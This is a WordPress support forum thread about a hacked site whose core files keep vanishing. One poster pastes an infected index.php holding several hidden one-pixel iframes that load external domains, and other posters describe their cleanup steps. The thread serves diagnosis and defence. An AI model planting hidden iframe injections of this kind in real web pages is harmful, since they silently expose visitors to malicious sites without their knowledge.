Is this malicious code at work?

If you believe someone may’ve compromised your site, why don’t you check you access and error logs?

I’ve done that. And I’m getting error messages that the files are missing. That is all. I checked to make sure that the “show errors” in php.ini was set to yes/true. But other than that, I’m not sure where else to look for these kinds of problems.

I put the files back in. Upon signing out of the website, the files were deleted again. I’ve read on the forums about several ppl missing this default-filters.php, and the assumption has always been that the download was corrupted somehow. HOwever, this appears to be a different case, or the same case, ruling out the ‘corrupt download’ theory.

Is there anywhere else I should check for malicious code? Anyone?

It’s gone again!!! I reinstalled it. One day later – GONE!!! Anyone have any clue at all?

Greatly appreciated,
Cathy

Its a virul infection. I have the smae freaking problem. default-filters.php is one of the infected files. Here is what appears in my index.php file…

<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./blog/wp-blog-
header.php');

echo "<iframe src=\"https://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"https://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"https://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
<iframe src="https://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="https://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="https://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="https://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>

<iframe src="https://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

Working with a client I just discovered a similar iframe malware insert in a number of php files including wp-login.php… this one was at the first line of the files, prior to the first <?php mark.

This was causing users who accessed the website using a PC to have their anti-virus software issue a warning… and it prevented admins from logging into the site.

By deleting the code from a number of files via the control-panel I was able to log back in, upgrade WordPress, change the passwords for all admin-level users, and hopefully prevent further changes to the .php.

I also deleted a subscriber account I didn’t recognize and checked the MySQL database to make sure there were no stealth users.

But I wonder whether or not this code is coming in via the web-based blog interface (i.e. using an admin-level account) or via some compromise of the hosting account? Any thoughts on this?

Check this thread for help with cleaning up and preventing future hacks. People do get hacked via shared hosting; from the FAQ:

“Check with your hosting provider. The hack may have affected more than just your site, especially if you are using shared hosting. It is worth checking with your hosting provider in case they are taking steps or need to. Your hosting provider might also be able to confirm if a hack is an actual hack or a loss of service, for example.”